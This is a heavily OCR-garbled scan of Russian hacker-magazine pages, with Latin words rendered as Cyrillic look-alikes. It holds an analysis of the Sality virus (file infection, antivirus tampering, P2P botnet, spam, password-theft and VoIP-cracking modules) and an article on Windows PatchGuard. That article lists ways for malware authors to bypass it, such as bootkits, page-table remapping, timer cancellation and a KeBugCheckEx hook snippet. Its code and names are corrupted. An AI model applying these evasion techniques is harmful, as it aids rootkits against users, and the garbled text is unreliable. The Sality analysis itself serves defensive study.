Сиггеп1:Ѵег5Іоп\Кип 

НКЕУ_ШСАЕ_МАСНІМЕ\50РТ1ліАКЕ\Місго5О-Рі;\1лііп6оіа/5\ 

Сиггеп1:Ѵег5Іоп\Кип 

• Сканируются (епитегаіе) файлы на подмонтированныхдисках 
от В: до 1\, но могут инфицироваться только исполняемые фай- 
лы с расширением ехе и зсг. 

• Корневые папки дисков, отличных отѴѴіпбоѵѵз-раздела, 
заражаются путем создания зараженной вирусом копии 
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Рисунок 7. Схема распространения вируса и его модулей с использованием Р2Р-сети 



программ «Калькулятор» (ѴѴіпсІоѵѵб Саісиіаіог) или «Сапер» 
(Міпезѵѵеерег). Файл создается с произвольным именем и рас- 
ширением ехе, стсі или ріС Также создается или модифициру- 
ется файл аіЛогип.іпІщля автоматического запуска созданных 
зараженных файлов при монтировании диска. На практике 
чаще всего заражаются ІІ5В-флешки и внешние жесткие 
диски. При запуске такого файла вместо запуска соответствую- 
щей программы (Са Ісиіаіог или Міпезѵѵеерег) открывается окно 
ѴѴіпсІоѵѵз Ехріогег. 

• Сканируются сетевые ресурсы, обнаруженные исполняемые 
файлы — кандидаты на инфицирование. 

Для файлов антивирусов (из списка) вместо заражения про- 
изводится попытка перезаписать код точки входа байтами «СССЗ 
СССЗ СССЗ СССЗ» (это повторяющиеся инструкции іпі 3 и геі). В слу- 
чае неудачи этой операции Заіііу пытается удалить файл. Модуль 



заражения также сканирует папки и удаляет файлы с расширением 
ѵсіЬ или аѵс — сигнатуры антивируса Зутапіес и Касперского. 

Еще одна интересная особенность модуля заражения: процеду- 
ры заражения отключаются, если список пиров (реегіізі) пуст. Это 
отражает своеобразную схему распределенной работы вируса: «нет 
необходимости просто локально заражать файлы, если отсутствует 
подключение к Р2Р-сети и невозможно скачивать дополнительные 
вредоносные модули». 

Как уже упоминалось, Заіііу — вирус-полиморф, он имеет ряд 
особенностей: 

• Адресточки входа не меняется (епігу-роіп* оЬзсигіпд). 

• Поадресуточки входа вирус размещаетуникальную «заго- 

товку» (зІііЬ) — кусок кода, созданный с помощью генератора 
полиморфного кода («Зітріе Роіу Епдіпеѵ 1.1а (с) 5ес1:ог») (его 
разбор мы публиковали еще в 2010 году — у/0]09гР). 

• «Заготовка» передаетуправлениетелу вируса, размещенному, 
как правило, в последней секции файла. Код вируса также по- 
лиморфен и содержит«мусорные» инструкции, чтозатрудняет 
обнаружение и эмуляцию антивирусами. Далее происходит 
дешифрация следующего блока — загрузчика. 

• Загрузчикзапускается вотдельном потоке инфицированного 
процесса. Его основная задача — за грузить и запустить основ- 
ные вредоносные модули 5а Іііу или перейти в режим ожидания 
в случае, если вирус в системе уже активен. 




Рисунок 8. Коммуникация с зараженного Заіііу компьютера 




Рисунок 9. Алгоритм работы Р2Р-модуля Заіііу. Красным выделен дополнительный блок алгоритма, отражающий усовершенствования в 4-й версии протокола 
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Рисунок 10. Дамп списка (пака) ІІВІ. 

• Одновременно с созданием отдельного потока для работы 
вируса происходитвосстановлениеоригинальнойточки входа 
(огідіпаі епігу-роіпі] иуправление передается коду исходной 
программы. Для файлов, помещенных в корневую папку диска 
(какописано выше], вместо запуска исходной программы вирус 
просто открывает о кно ѴѴіпсІоѵѵз Ехріогег. 

Для синхронизации активных копий вируса и предотвращения 
одновременной работы вредоносных модулей Заіііу создает мью- 
текс с именем «ихАреІт», уникальный д ля разных версий. Нали- 
чие мьютекса с таким именем в системе — показатель заражения 
вирусом. С другой стороны, создание этого мьютекса заранее — 
простой и эффективный способ, «прививка», предотвращающая 
первоначальное заражение системы. 



МОДУЛЬ ЗАКАЧЕК 



Модуль закачек отвечает, как следует из названия, за скачивание 
и запуск дополнительных вредоносных модулей с ІІРІ_-адресов, 
полученных модулем реег-іо-реег. 

Скачанные файлы обычно закодированы шифром РС4, ключ 
которого прописан в теле вируса. Хотя детали шифрования разли- 
чаются в зависимости от сетевой версии, обычно для инициализа- 
ции 5-Ьох используется ключ «кикиішзіесі!.» в старых версиях или 
« (3 сМ Р I и 5 . сі 1 1 » в новых. 

Судя по такой «подписи», наиболее вероятно, что вирус Заіііу 
и его вредоносные модули созданы одним и тем же автором. 

Однако вредоносные модули работают по традиционной схеме 
и соединяются с С&С-серверами, расположенными по всему миру. 
Вот список вредоносных модулей, распространяемых 5а Іііу: 

• Спам-генераторы и спам-шлюзы (брат геіау). Наиболее по- 
пулярный тип модулей. Содержание спама обычно связано 

с рекламой казино или фармацевтикой. 

• НТТР-прокси. Используются для маскировки сетевой активно- 
сти и достижения анонимности. 

• Сборщики информации. Собирают пароли, учетные записи 

и персональные данные, в том числе и данные веб-форм (вне- 
дрение в Іпіегпеі Ехріогег). 

• Заражение веб-сайтов. Этот вредоносный модуль перехваты- 
вает учетные записи РТР, после чего подключается к данным 
РТР и заражает НТМІ_-файлы. Заражение происходит путем 
внедрения простого ІРРАМЕ, указывающего на сторонний 
ресурс, или (более сложный вариант) используются скрипты, 
выполняемые на стороне сервера. Цели подобных заражений 
могут варьироваться от бгіѵе-Ьу сіоѵѵп ІоасІ и заражения поль- 
зовательских компьютеров до спам-рассылок. 

• Распределенная система взлома. В феврале 2011-го операторы 
вируса Баіііу распространили вредоносный модуль, который 
использовал свою распределенную сеть для взлома ѴоІР- 
аккаунтов. Этот модуль может работать в нескольких режимах 

в зависимости от команд С&С-сервера: 

• регистрация аккаунтов на целевом сервере (функционал 
реализован не полностью); 
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Рисунок 11. Темпы заражения БаІіІу.АЕ (количество новых заражений в месяц) 

• взлом аккаунтов: С&С отправляет модулю список аккаунтов 
и список паролей для перебора. Обнаруженная корректная 
пара логин — пароль отправляется обратно на С&С-сервер; 

• обнаружение 5ІР- и НТТР-серверов: С&С отправляет модулю 
список ІР-адресов для сканирования. Результат сканирова- 
ния сообщается С&С-серверу; 

• взлом Азіегізк РгееРВХ: обнаруженные в предыдущем шаге 
или полученные из других источников списки серверов 

и списки паролей используются для обнаружения и подбора 
паролей к серверам Азіегізк РгееРВХ. 

Цели у подобного рода атак, как правило, финансовые. Можно 
зарегистрировать платный номер и совершить звонок на него 
с каждого из обнаруженных 5ІР-аккаунтов. Взлом РгееРВХ может 
нести и более серьезные последствия, так как злоумышленник по- 
лучает контроль над аутентификацией и тарификацией пользова- 
телей, а также маршрутизацией звонков. 



ЭКСПЕРИМЕНТАЛЬНЫЕ ВРЕДОНОСНЫЕ МОДУЛИ 



На сегодняшний день известно всего два экспериментальных мо- 
дуля, запущенных, по всей видимости, для отработки технологии 
в качестве «пробного шара». Первый модуль — это скрипт автома- 
тической регистрации приложения РасеЬоок. Модуль — сборщик 
информации, внедренный в Іпіегпеі Ехріогег через стандартный 
СОМ-интерфейс, собирает из веб-форм регистрационные данные, 
отправляет С&С-серверу и сохраняет локально в зашифрованном 
виде. Экспериментальный модуль выполняет скрипт со следую- 
щей очередностью действий: открыть Іпіегпеі Ехріогег в режиме 
видимого (!) окна, перейти на сайт РасеЬоок. сот, войти, используя 
перехваченные регистрационные данные, перейти на страницу 
приложения VI Р 5Ыз (#119084674184), разрешить доступ прило- 
жению, закрыть окно. Приложение использует доступ на уровне 
« В а 5 і с іпіюгтаііоп» — имя, пол, фото и список друзей. На данный 
момент этот модуль не производит никаких вредоносных действий 
(потому и назван экспериментальным), однако сама возможность 
подобного рода активности позволяет злоумышленникам исполь- 
зовать взломанный аккаунт РасеЬоок для распространения спама 
(постинги) или для приобретения виртуальных кредитов. 

Еще один скрипт, распространенный Заіііу, выполнял следую- 
щие действия: запустить Іпіегпеі Ехріогег в невидимом режи- 
ме, перейти на сайт доодіе.сот, запустить поиск строки «аиіо 
іпзигапсе Ьісіз», закрыть окно. 

Скрипт служит экспериментальным целям и может позволить 
продвигать те или иные темы в Соодіе Тгепсіз, где наблюдается за- 
метный пик популярности по данному запросу. 



МОДУЛЬ РЕЕК-ТО-РЕЕК 



Модуль и субмодули реег-іо-реег отвечают за распространение 
11Р1_-ссылок на вредоносные модули. 

Исполняемые зараженные Заіііу файлы присоединяются к сети 
реег-іо-реег, состоящей из таких же зараженных компьютеров. 
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В отличие от других ботсетей Р2Р-сеть не имеет фиксированных 
С&С-серверов. В случае Баіііу попытка положить или заблокиро- 
вать сеть ботнета будет означать необходимость заблокировать 
все суперпиры, что теоретически возможно, но трудно реализуемо. 
Следует помнить, что 5а Іііу не троян, это вирус, а излечение ВСЕХ 
файлов, на ВСЕХ зараженных компьютерах— одна из труднейших 
задач индустрии ІТ-безопасности. 

Первичное соединение с сетью происходит с помощью началь- 
ного списка (Ьооівігар Іізі) пиров, содержащегося в зараженных 
файлах и включающего координаты (публичный ІР, порт) ряда уже 
существующих пиров. Во всех вариациях вируса, с которыми мы 
имели дело, размер списка ограничивается 1000 записями. 

В момент первого запуска Баіііу в реестре ѴѴіпсІоѵѵз создается 
локальная копия начального списка (в ветке НКЕѴ_СІІРРЕІ\ІТ_ІІ5ЕР 
под псевдослучайным именем), и в дальнейшем этот локальный 
список обновляется путем добавления новых активных и удаления 
«мертвых» пиров. 

На одном зараженном компьютере могут присутствовать не- 
сколько версий вируса Баіііу (хотя активной может быть только 
одна) и, как следствие, присоединяться к разным сетям. 
Существует по меньшей мере четыре версии протоколов: 

• экземпляры реализации версии протокола VI не обнаружены; 

• версия Ѵ2 впервые была обнаружена в начале 2008 года, но на 
данный момент уже «мертва»; 

• версия протокола ѴЗ и сеть на ее основе на сегодняшний день 
является наиболее распространенной и разветвленной. Первые 
упоминания об этом протоколе встречаются начиная с 2009 года; 

• сеть на основе протокола Ѵ4 заметно меньше сети ѴЗ. Впервые 
была обнаружена в конце 2010 года. 

Различия между протоколами версий Ѵ2 и ѴЗ минимальны, 
однако появление нового протокола не обязательно коррелиру- 
ет с новыми возможностями самого вируса. Поскольку каждый 
зараженный файл содержит открытый ключ, используемый для 
проверки списка 11Р1_-ссылок, то каждая новая версия протокола 
требует использования нового ключа. Можно предположить, что 
переход от версии V 2 к ѴЗ был продиктован фактом компрометации 
закрытого ключа, используемого для подписи списка 11П1_. 

В протоколе 3-й версии после скачивания и проверки списка 
ІІРІ_-адресов (см. ниже) не производится никаких прочих проверок 
ни самих адресов, ни файлов, скачиваемых с них. То есть можно из- 
менить записи БІМБ и/или подменить файлы-вредоносы на свои, что 
позволит контролировать как саму ботсеть, так и вредоносную ак- 
тивность. С целью устранения указанных слабых сторон 3-й версии 
автор разработал 4-ю версию. 



КАК БОРОЛИСЬ С 5АЫТѴ 



«Мы познакомились с вирусом Баіііу в корпоративной сети одного 
из крупных российских заказчиков в рамках противодействия 
уже начавшейся эпидемии. Было очень непросто обнаружить 
все его экземпляры — он заражал исполняемые файлы, 
каждый раз заново шифруя свое тело. Обычные сигнатуры тут 
не помогут — потребовалось создание специальных утилит, 
постоянно обновлявшихся на основе информации о все новых его 
разновидностях. Да и с лечением было непросто — внедрившись 
в систему на уровне ядра, он скрывал свои файлы, останавливал 
антивирусные процессы и препятствовал их запуску. Наши 
эксперты работали почти круглосуточно довольно долго — время 
простоя в финансовой организации очень дорого. Баіііу — очень 
интересная и серьезная разработка отечественных специалистов». 
Один из первых экспертов, столкнувшихся с Баіііу 



РАСПРОСТРАНЕННОСТЬ ВИРУСА 



На текущий момент существует около двух десятков различных 
модификаций Баіііу, для которых созданы отдельные сигнатуры. 
Самой активной и обнаруживаемой наиболее часто является 
модификация БаІіІу.АЕ. 



Количество зараженных Баіііу компьютеров по странам 
(в процентах от общего числа зараженных) 



В ней вводятся следующие изменения: 

• цифровая подпись скачиваемых с С&С-серверов файлов, с ис- 
пользованием того же ключа, что и для списка ІІРІ_-адресов; 

• список ІІРІ_ становится не единственным путем получения 
вредоносных модулей. Каждый суперпир запускает у себя 
ТСР-сервер и позволяет осуществлять прямой обмен файлами 
(ЕХЕ раскз) между пирами. Эти файлы также имеют цифровую 
подпись; 

• для лучшей защищенности ПБА-ключ стал 2048-битным 
(в 3-й версии 1024 бит). 

Основная роль сети Р2Р, то, для чего Р2Р была введена в кон- 
цепцию Баіііу, — это возможность распространения ІІРІ_-ссылок 
на С&С-серверы, откуда зараженные компьютеры скачивают вре- 
доносные модули. Как раз для обмена ссылками и служит команда 
Раск ЕхсЬапде. Защита целостности сети обеспечивается тем что, 
все ІІРІ_-списки имеют порядковый номер и цифровую подпись. 
Пиры установят и задействуют распространяемый список ІІРІ_ 
только в том случае, если проверка цифровой подписи пройдет 
успешно, а порядковый номер окажется больше, чем номер, кото- 
рый пир имеет в данный момент. 



ЗАКЛЮЧЕНИЕ 



Если говорить про файловые вирусы, то Баіііу определенно выби- 
вается из ряда других своих «коллег». Его механизмы противодей- 
ствия антивирусному ПО в комбинации с оригинальными схемами 
распространения делают этот вредонос эффективным и живучим. 
Большая и разветвленная сеть Баіііу версии 3 позволяет угрозам 
быстро распространяться, а появление следующей, четвертой 
версии следует воспринимать как еще более серьезную проблему. 

На данный момент им инфицированы сотни тысяч компьютеров. 
Вредоносные модули, внедряемые на эти компьютеры, могут быть 
относительно безобидными (рассылка спама), а могут и представлять 
высокий риск (сборщики паролей). Помимо этого, появились механиз- 
мы сбора данных веб-форм с акцентом на аккаунты РасеЬоок и Соодіе 
ВІоддег, даже позволяющие осуществлять активные действия с ис- 
пользованием этих данных. Возможно, завтра операторы ботсети 
Баіііу внедрят модуль сбора банковских данных, кто знает... ПЕ 
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Мал варщики 

против РаІсІібиагсІ 



Технология КегпеІ РаІсН Ргоіесііоп, более 
известная широкой публике под названием 
РаІсИбиагсІ, предназначена для защиты ОС 
ѴѴіпсІоѵѵз. Создание и реализацию этой техно- 
логии можно смело приписывать к несомнен- 
ным заслугам МісгозоО: в области обеспече- 
ния защиты ОС от руткитов. Но если набрать 
в Гугле «Раісббиагсі», то всемогущий поис- 
ковик выдаст нам мало чего вразумительного. 
Не знает Гугл ничего об этой таинственной 
технологии Місгозо^. Яндекс тоже, кстати, 
в поиске по Раісббиагсі находится в пролете, 
аки фанера над Парижем. Но не будем судить 
строго. Вины поисковиков в этом нет: практи- 
чески вся информация об особенностях этой 
технологии — результат трудов независимых 
исследователей-кодокопателей. Сегодня мы 
не только в деталях рассмотрим, что такое 
РаІсИбиагсІ и с чем ее едят, но и поговорим 
о способах ее обхода — тематика журнала того 
требует;). 



ЛЕЗЕМ В НЕДРА 
ТАИНСТВЕННОЙ 
ТЕХНОЛОГИИ М5 — 
КЕКЫЕІ. РАТСН 
РКОТЕСТІОЫ 



ЧТО ИМЕЕМ? 



Суть технологии РаІсЬСиагсІ проста — система защищает адрес- 
ное пространство ядра от попыток модификации, тем самым не 
допуская попыток захвата жизненно важных системных позиций. 
Защите подлежат объекты, наиболее критические с точки зрения 
безопасности системы, — это 550Т, СОТ, ЮТ, специфические ре- 
гистры процессора М5Р (через которые проходяттак называемые 
зузсаііз), а также само ядро — піоз.ехе, библиотека абстракции от 
оборудования ЬаІ.сІІІ и драйвер сетевых операций псПз.вув. 

После успешного старта РаІсЬОиагсІ в случайные промежутки 
времени проверяет целостность виртуальных адресов ядерного 
пространства и, если обнаруживает подозрительные модифи- 
кации, тут же поднимает тревогу с вызовом полиции, скорой, 
пожарных и МЧС в придачу. А если серьезно, то эта технология 
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Малварщики против РаІсЬбиагсІ 



просто сваливает систему в В5СЮ с кодом СРІТІСАІ__5ТПІІСТІІПЕ_ 
СОРРІІРТІОІМ (ЬидсЬеск 0x109). 

РаІсЬ 3 иа гсі присутствует лишь в системах ѴѴіпсІоѵѵз ѴізІа+, 
крутящихся на 64-битных системах. Старушке ѴѴіпсІоѵѵз ХР все 
прелести РаІсЬОиагсІ не грозят. Кстати, сами майкрософтовские 
товарищи категорически не приветствуют патчи кегпеі-зрасе 
сторонними драйверами, в том числе использованием ядерных 
стеков, не созданных непосредственно самим ядром ( Ьіі.Іѵ/ 
ВЕіЕіП ). Вместе с тем надо отметить, что РаІсЬОиагсІ защища- 
ет лишь ядро от патчей драйверов, ноне защитит патчи одних 
драйверов другими. 

Надо признать, что данная ситуация ставит в тупик разработ- 
чиков систем защит ОС ѴѴіпсІоѵѵз, ведь современные требования 
к разработке таких защит просто вынуждают контролировать 
пользователя на уровне ядра, например при помощи перехвата по- 
тенциально опасных функций в 550Т. При этом сами же разработ- 
чики ОС ѴѴіпсІоѵѵз вряд ли предоставят возможности для взаи- 
модействия с РаІсЬбиагсІ ( Ьіі:. Іѵ/ОТ5ѴѴт N 1 — зачем давать в руки 
врагов ключи от квартиры, где деньги лежат? 

Однако выкручиваться из этой ситуации как-то надо, и сегодня 
мы попробуем рассмотреть все или почти все имеющиеся способы 
ужиться с РаІсЬОиагсІ на одной системе. 



РАТСНѲІІАКР — ВЗГЛЯД ИЗНУТРИ 



Инициализация РаІсЬбиагсІ до ее полного включения — очень 
замороченная операция. Ее натуральный старт происходит вы- 
зовом функции пНКіІпШаІігеРаІсЬОиагсІ, однако, прежде чем дело 
дойдет до ее вызова, должна произойти масса малопонятных 
и совсем непонятных вещей. Если приглядеться повниматель- 
нее, то старт РаІсЫЗиагсІ происходит где-то на самом раннем 
этапе загрузки операционной системы — со стартом основной 
«загрузочной функции» — пНКеІпііЗузІет. И если поковыряться 
в дизасме этой функции, то можно увидеть все суровые извра- 
щения разработчиков МісгозоЙ. Нет, серьезно, я понимаю, что 
перед ними стоит задача защитить систему и замаскировать про- 
цесс инициализации РаІсЬОиагсІ, но не обязательно это делать 
настолько изощренно! 

Итак, смотрим. Старт РаІсЬОиагсІ происходит вызовом функ- 
ции пі!КЮіѵісІе6432, которая делает важное дело — мастерски 
делит два числа. Далее начинается магия — идет вызов функции 
пНКіТезЮіѵісІепсІ, которая просто тестирует полученный результат 
с (внимание!) прошитым в коде (!) значением: 

п* ! КеІпі1:5у5І:ет+Ѳх158 : 

тоѵ гсхДпІ: ! КіТез’ШіѵісІепсІ] 

тоѵ есІх л 0хсЬ5-РаЗ 

саіі пі: ! КЮіѵісІе6432 

стр еах. [ КіагсІсосІесІ ѵа!ие_ ] 

дпе п* ! КеІпі1:5у5І:ет + 0x170 



п’ЫКеІпгЬБуз'Ьет + 0x170: 
тоѵ есх л 0х5сІ 

саіі п* ! КеВи§СІіеск / /вых о д по о шибке ІЛМ5ЦРР О КТЕР РК0 СЕ550 К 

Кто-то может спросить: почему именно хардкод при инициа- 
лизации? Не слишком умно, правда? Но это лишь на первый 
взгляд. Данный хардкод, как выясняется, нужен лишь для того, 
чтобы выявить, не находится ли система под дебагом. Как имен- 
но это происходит — оставлю тебе в качестве домашнего за- 
дания ;). 

Выполнение функции КМпіІіаІігеРаІсЬѲиагсІ несет в себе 
много рутины — она мониторит инициализацию контекстов 
550Т, таблиц ОйТ/ЮТ, ключевых регистров процессора М5Р, 
а также некоторых критических дебаг-функций. Первое, что 
делает КМпіІіаІігеРаІсЬбиагсІ, — это проверяет, не загружается ли 
система в безопасном режиме. В этом случае, то есть при загрузке 
в 5а(еМосІе, РаІсЬѲиагсІ инициализирован не будет: 




Примерная логика действий РаІсЬСиагсі 

пі ! КЮіѵісІе6432+0х570 : 
зиЬ гзр.Ѳх2сІ8 

стр сімогсі рі: г [ пі: ! ІпіІіБа-РеВооІіМосІе] 

д пе п* ! КЮіѵісІеб432+0х580 



пі ! КЮіѵісІе6432+0х580 : 
тоѵ а1 л 0х1 
асИ Г5р.0х2с18 
геі: 

Детальный разбор полета функции КіІпіІіаІігеРаІсЬОиагсІ по- 
требует не один десяток страниц журнала, поэтому остановимся 
на основных моментах. 

Главное, что надо знать, когда работаешь с РаІсЬОиагсІ, — 
РаІсЬОиагсІ высчитывает контрольные суммы защищаемых 
объектов вызовом функции РдСгеаІеВІоскСЬескзитВиЬСопІехІ 
и хранит их в особой структуре РАТСН61ІАР0_С0ІМТЕХТ. Для «об- 
работки» каждого защищаемого объекта используются функ- 
ции РдСгеаІеІтадеЗиЬСопІехІ (для системных образов и 550Т), 
РдСгеаІебсКБиЬСопІехІ и РдСгеаІеІсКБиЬСопІех (для ОйТ/ЮТ), 
РдСгеаІеМзгБиЬСопІехІ (для защиты МБР) и РдСгеаІеОеЬидРоиІіпе 
БиЬСопІехІ (для отладочных процедур). 

Память под контекст выделяется в условиях очень высокой ано- 
нимности, так, чтобы обломать любителей пошариться по чужим 
виртуальным адресам. Маскировка контекста проводится вызовом 
РдЕпсгуріСопІехІ, которая не слишком продвинуто ксорит пере- 
даваемый ей РАТСН01ІАРО_СОІ\ІТЕХТ и возвращает вызывающему 
ХОР-ключ. 



«АМЫ ПОЙДЕМ НА СЕВЕР...» 



Обойти РаІсЬОиагсІ сложно, но можно. Вообще, строго говоря, 
хорошим парням обход РаІсЬОиагсІ не нужен. МісгозоЙ пре- 
красно понимала, что вводом этой системы в строй отнимает 
часть хлеба у разработчиков антивирусных защит и проактивных 
систем. Для решения этой задачи МісгозоЙ ввела ряд новых, 
неизвестных доселе ІМаІіѵе АРІ и коллбэков, позволяющих от- 
слеживать телодвижения ОС. Например, чтобы отслеживать 
изменения в реестре, в руки системных кодеров была передана 
функция пН^ѵѵЫоШ'уСЬапдеКеу или коллбэк СтРедізІегСаІІЬаскЕх, 
которые были призваны информировать обо всех изменениях 
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МАШАКЕ 



ксІ> к 

СЬШ-ЗР 

ІШШІ'гШБДО 
«Г«айг'а4а1БівО 
НШаЛГ'е4в160&0 
(ІІІІайТ ‘ е4а1 66Э0 
ГіШайГ'еПаібеоО 
«ШйАГ'НаібЭ&З 
тНа«‘е4аі69аО 
ГШіа4Ге4а16аБ0 
««ГааГеАаібгНО 
1іШай*‘е4аі6<іТ0 
НІНкІГі 4аі€<М0 



ВеШЙг 

ШНв<Ю*0Ш44сі4 
*««вО0*ОІОБ8<і75 
ІІШ«Ю*0І04І7М 
11111800' ОІОЗТЬЬТ 
ІШШХГ0І42ШЬ 
«ШеОО'ОІ 42 і 2 ЯЗ 
іІНШХѴОІ42а226 
(«ИвОО* 0 1243*09 
И(«ЙОО н 0і2Ь226а 
ШііеОО'01044416 
ОООООООО' 00000000 



Саіі ЗНе 
пг !КіОр_9іѵ+Оя29 
□г ІКіРгяргасоззРаиІЕ+ОлеТ 
□Ъ !КіВіяраісЬЕлсвр(;іоп + 0хВБ 
иг 'КіЕхсйргіопЕтп г 
□г !Кі0іѵіаѳЕтг4гРаиіг+СхЬ7 
аг !Кі9іѵі<1е6432+0хЬ 
пг !КйІРігБузГеа+0т169 
□ПТ&амТТлТТіаІігасТёлЛ і а саг4+Ох03ѳ 
пг ! РЬаа й 1 1п і с і аі і гаь 1 о ь+ОхН 
пг ! РзрЗу згезТЬт4а45гаггир»Ох30 
пг іКіЗгагтЗуэмтТЪгеай+Охіб 



І'.'І ѴАѴІ 

На великом 
и могучем инфы 
в Сети о РаІсІіСиагсІ 
почти нет. Для 
общего развития 
можно почитать 
статью К. Касперски 
«Взлом РаІсН- 
биагсі» — із.асі/ 
хРВ2Ц. Изанглицких 
статей можно 
почитать РАО про 
РаІсЬбиагсІ — із.агіі/ 
хРкрКУ . 



Коллстек вызовов 
при старте системы: 
хорошо видна 
инициализация 
РаІсИбиагсІ 




Информации в Сети 
о РаІсЬбиагсІ очень 
мало. Оно и по- 
нятно — МІСГ 050 Й 
совсем незаинтере- 
сована в раскрытии 
особенностей этой 
технологии. 



ГАКШЫ6 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



в реестре без перехвата в 550Т таких функций, как 2ѵѵСгеаІеКеу/ 
2ѵѵЕпштегаІеКеу. 

Таким же, например, образом, была разрешена проблема фай- 
ловых фильтров, когда для контроля за файловой системой были 
введены в эксплуатацию мини-фильтры, для чего был реализован 
целый выводок РІІ*-функций. Таким образом, МісгозоЙ достигала 
вроде бы своей цели... Но не тут-то было. 

Согласись, что здравый смысл в происходящем есть. 

Но как оказалось на практике, не так-то просто уместить все за- 
дачи для обеспечения безопасности ОС в рамки одних коллбэков 

Обеспечение полноценной безопасности системы — настоль- 
ко трудоемкая и труднореализуемая задача, что предлагаемый 
МісгозоЙ инструментарий оказался явно недостаточен. Ауж 
что говорить о плохих парнях, которым МісгобоЙ с введением 
РаІсЬбиагсІ хоть и сильно осложнила жизнь, но отнюдь не отбила 
желание заниматься своей грязной работенкой? 



«ОГЛАСИТЕ ВЕСЬ СПИСОК, ПОЖАЛУЙСТА...» 



Первое и самое популярное решение для обхода РаІсЫЗиагсІ, ко- 
торое имеется в арсенале малварщиков, — это создание буткита, 
который бы стартовал до запуска РаІсЬСиагсІ. 

И действительно, люди, не понаслышке знакомые с нынешними 
запросами заказчиков малвари под ѴѴіп7 х32/х64, знают, что самое 
популярное (и, пожалуй, единственное) требование — это создание 
МВР/ѴВР-руткита, с обходом РаІсЬСиагсІ до его инициализации. 
Цена вопроса, кстати говоря, не один десяток тысяч зеленых аме- 
риканских рублей. 

Второй способ обхода РаІсЫЗиагсІ малоизвестен широкой 
публике. Он основан на манипуляциях с РОЕ/РТЕ-адресами. 

Я как-то уже писал в ][ об этом способе, позволяющем подменять 
фактические данные, не трогая виртуальных адресов, за которые 
цепляется РаІсЬОиагсІ. В его основе лежит механизм трансляции 
виртуальных адресов памяти в физические, которая применяется 
во всех современных операционных системах семейства ѴѴіпсІоѵѵз. 
Обращения к виртуальным адресам для какого-либо процесса 
в ѴѴіпсІоѵѵз можно перенаправить на поддельную физическую 
страницу, что достигается изменением значений физического 
адреса, которые хранятся в его РйЕ/РТЕ-таблицах. Вся соль тут 
в том, что РаІсЬОиагсІ не смотрит за этими физическими адресами, 
чем можно воспользоваться. Не смотрят за этими физическими 
адресами и популярные антируткиты. 

Недостаток данного способа — его трудно реализовать. Работа 
с РОЕ/РТЕ-адресами требует очень хороших навыков системно- 
го кодинга в ядре и отличных знаний кегпеі тобе отладки. Ибо 
любые, даже самые незначительные косяки в твоем коде приведут 
к нехорошим последствиям, самое безобидное из которых — за- 
висание системы. 



Вместе с тем надо признать — обход РакЬбиагб в виде под- 
мены РОЕ/РТЕ-адресов есть малоисследованная область кегпеі- 
кодинга, которая незаслуженно забыта разработчиками малвари. 
Впрочем, может, сами разработчики поизмельчали? ;) 

Другой широко распространенный в узких кругах способ рас- 
пила РаІсЫЗиагсІ — это перехват функций таймерного механизма, 
регулирующих периодический запуск РакЬСиагб. И действи- 
тельно, для периодической проверки РаІсЬСиагсІ использует 
стандартную кегпеі -АРІ пІІКеІпіІіаІігеОрс. После инициализации 
йРС следует вызов таймера пі!Ке5еП"ітег, который ставит пла- 
нируемую йРС в очередь. Суть обхода РакЫЗиагб в этом случае 
в том, что нужно перечислить имеющиеся таймеры, найти нужный 
нам и отменить его. Несмотря на кажущуюся легкость, сделать 
это проблематично: чтобы найти необходимый таймер, нужно 
знать, что искать. 

Другой распространенный способ, наверное, не так очевиден 
на первый взгляд, но вполне имеет право на существование. 

Это — перехват функции пІІКеВидСЬескЕх. Если уж совсем при- 
митивно — то при попытке разбить оковы РаІсЬСиагсі возникнет 
исключение, которое, по идее, должно быть обработано функцией 
пІІКеВидСЬескЕх. 

Идея, заложенная в этом способе, проста и гениальна. 

Смотрим код: 

РА5Т_М1ЛЕХ 1лІаі1=А1ыау5 ; 



і-р (ІпВи^Собе == СКІТІСАІ. 5ТКЦСШКЕ ССЖКЦРТІОІ\0 

{ 

ЕпаЫеІп1:еггир1:5( ); 
ЕхІпі1:іа1І2еРа5І:Ми1:ех(&Маі1:А1мау5) ; 
ЕхАсдиігеРа5І:Ми1:ех(&Маі1:А1і\/ау5) ; 

} 

Все, что надо сделать, — это «заморозить» поток, который вы- 
звал исключение, и вернуть управление, позаботившись о пра- 
вильном восстановлении стека. 



ЗАКЛЮЧЕНИЕ 



Как видишь, обойти РакЬСиагб можно. По крайней мере, процве- 
тающие ныне руткиты прекрасно выживают и в 64-битной среде. 
И почти все они являются буткитами, то есть фактически они 
не обходят РаІсЬСиагсі, а стартуют до нее. 

Но стремительное и неотвратимое появление в нашей жизни 
64-битных систем просто обяжет малварщиков искать новые пути 
выживания. На этом закончу. Удачного компилирования и да пре- 
будет с тобой Сила! □С 
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Ргеѵіеѵѵ 



ІМІХОШ 
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ПРИРУЧЕНИЕ СТРОПТИВОЙ 

Попридержи шутки о некрофилии 
и шапочках из фольги — твое мне- 
ние об ОрепВЗО может кардиналь- 
ным образом измениться. Команда 
разработчиков под предводитель- 
ством легендарного Тео де Раадта 
дает тебе уникальную возможность 
получить в свое распоряжение, 
возможно, самый правильный ІІІМІХ 
из всех ныне живых. 

ОрепВЗй — это про качество 
кода, постоянные аудиты безопасно- 
сти и высокую надежность. Но чтобы 
оценить все это, тебе нужно сделать 
первый шаг — поставить ОС и полу- 
чить полноценное рабочее окруже- 
ние. Не волнуйся, с этим мы тебе 
точно поможем. 




кодинг 



ІЖІХОЮ 
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КОДЕРСКИЙ ГОСКНИГОФОНД 

Продолжаем разговор о ти5І-геасІ книгах 
для разработчиков. В этот раз перейдем от 
фундаментальныхтем к практическим — 
поговорим отестировании, управлении 
проектом и многом другом. 
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АЛГОРИТМЫ ОБЪЕДИНЕНИЯ-ПОИСКА 

Предположим на минуту, что случилось 
невероятное — твой кодзапустятна 
компьютере, не входящем в рейтинг 
ЮР500. Предлагаем тебе набор рецептов 
по оптимизации твоей программы. 
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ПИНГВИН ДАЛЬНЕГО ПОЛЕТА 

Любишь работать в дороге? Ненавидишь 
носить с собой зарядку и бегать в поиске 
розетки? Тогда этот материал научиттебя 
выжимать максимум из батареитвоего 
Ыпих-бука! 



5УЫ/АСК 



РЕККІІМ 






КЛАДОВАЯ ДАННЫХ 




СЕТЕВОЙ УПРАВДОМ 
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Рассматриваем новые возможности 
файловых служб в ѴѴіпсІоѵѵз Бегѵег 201 2, 


128 


РНО — инструмент, способный упростить 
управление сложными корпоративными 


132 



